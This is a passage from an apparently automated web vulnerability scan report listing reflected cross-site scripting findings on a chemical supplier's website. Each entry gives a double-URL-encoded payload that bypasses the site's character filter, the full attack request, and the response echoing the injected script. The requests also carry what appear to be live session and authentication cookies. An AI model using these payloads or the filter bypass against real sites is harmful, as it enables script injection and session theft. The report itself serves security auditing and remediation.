1.263. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 438be%2522%253balert%25281%2529%252f%252f5ccf57b4760 was submitted in the REST URL parameter 4. This input was echoed as 438be";alert(1)//5ccf57b4760 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states438be%2522%253balert%25281%2529%252f%252f5ccf57b4760/press-releases/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:21 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states438be";alert(1)//5ccf57b4760/press-releases/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.264. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d82a%2522%253balert%25281%2529%252f%252f9033127b06c was submitted in the REST URL parameter 5. This input was echoed as 9d82a";alert(1)//9033127b06c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releases9d82a%2522%253balert%25281%2529%252f%252f9033127b06c/biodegradable-polymers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:27 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases9d82a";alert(1)//9033127b06c/biodegradable-polymers","E404") ;
   </script>
...[SNIP]...

1.265. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/biodegradable-polymers [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/biodegradable-polymers

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c98d8%2522%253balert%25281%2529%252f%252f2d9fa9f2058 was submitted in the REST URL parameter 6. This input was echoed as c98d8";alert(1)//2d9fa9f2058 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releases/biodegradable-polymersc98d8%2522%253balert%25281%2529%252f%252f2d9fa9f2058 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:36 GMT
Content-Length: 28978
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases/biodegradable-polymersc98d8";alert(1)//2d9fa9f2058","E404") ;
   </script>
...[SNIP]...

1.266. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ef92%2522%253balert%25281%2529%252f%252fb0e60677ef3 was submitted in the REST URL parameter 1. This input was echoed as 1ef92";alert(1)//b0e60677ef3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc1ef92%2522%253balert%25281%2529%252f%252fb0e60677ef3/medialib/countries/united-states/press-releases/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:04 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc1ef92";alert(1)//b0e60677ef3/medialib/countries/united-states/press-releases/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.267. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48eb3%2522%253balert%25281%2529%252f%252f508adc6d619 was submitted in the REST URL parameter 2. This input was echoed as 48eb3";alert(1)//508adc6d619 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters, for example by submitting %253c instead of the < character: the web server's single decode turns %253c into %3c, which contains nothing the filter rejects, and the application's own second decode then turns %3c into a literal <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context; where it must, the value should be escaped for a JavaScript string literal at the point of output (for example as \xHH or \uHHHH sequences for quotes, backslash, <, > and line terminators) rather than relying on a character blacklist. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2, as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, so that the filter sees the same bytes the sink does.

Request

GET /etc/medialib48eb3%2522%253balert%25281%2529%252f%252f508adc6d619/countries/united-states/press-releases/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:09 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib48eb3";alert(1)//508adc6d619/countries/united-states/press-releases/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.268. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7986%2522%253balert%25281%2529%252f%252f31940e1e566 was submitted in the REST URL parameter 3. This input was echoed as d7986";alert(1)//31940e1e566 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

